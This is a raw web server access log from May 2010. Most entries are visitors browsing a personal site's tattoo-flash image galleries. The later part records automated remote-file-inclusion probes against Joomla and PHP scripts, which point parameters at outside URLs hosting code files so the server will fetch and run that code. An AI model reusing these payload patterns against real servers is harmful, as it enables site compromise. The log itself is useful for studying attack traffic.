96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:07 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:15 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:16 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:16 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:16 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:16 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:24 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:25 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:25 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:25 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:33 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:38 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:43 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:34:59 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.250.224.242 - - [18/May/2010:20:35:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&ct=res&cd=2&ved=0CBoQFjAB&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=bert+grimm+tattoo+flash&ei=SEDzS5HEH8Oclgej4uCBDQ&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:11 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:11 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:35:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
96.250.224.242 - - [18/May/2010:20:36:01 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:47 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:49 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:36:49 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:37:08 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:37:08 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:37:09 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:20:37:42 -0500] "GET /logs/access_log.1235174400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [18/May/2010:20:38:54 -0500] "GET //include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:38:54 -0500] "GET /logs//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:38:54 -0500] "GET /logs/access_log.1265587200//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.204.193 - - [18/May/2010:20:40:36 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [18/May/2010:20:41:10 -0500] "GET /logs/access_log.1265587200//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:41:10 -0500] "GET //include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:41:10 -0500] "GET /logs//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.195.223 - - [18/May/2010:20:41:37 -0500] "GET /logs/access_log.1233532800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.201.180.130 - - [18/May/2010:20:41:53 -0500] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.201.180.130 - - [18/May/2010:20:41:53 -0500] "GET /koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.201.180.130 - - [18/May/2010:20:41:53 -0500] "GET /logs/access_log.1272844800/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:42:22 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:42:32 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:42:34 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:42:41 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.112.180 - - [18/May/2010:20:43:57 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [18/May/2010:20:44:40 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.204.245.212 - - [18/May/2010:20:45:46 -0500] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.204.245.212 - - [18/May/2010:20:45:46 -0500] "GET /koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.204.245.212 - - [18/May/2010:20:45:46 -0500] "GET /logs/access_log.1272844800/koesubmit.php?mosConfig_absolute_path=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:45:58 -0500] "GET //include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:45:59 -0500] "GET /logs//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:46:00 -0500] "GET /logs/access_log.1265587200//include/lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.190.102.21 - - [18/May/2010:20:51:14 -0500] "GET //component/option,com_frontpage/Itemid,1//index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.190.102.21 - - [18/May/2010:20:51:14 -0500] "GET /logs/access_log.1272844800%20%20//component/option,com_frontpage/Itemid,1//index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
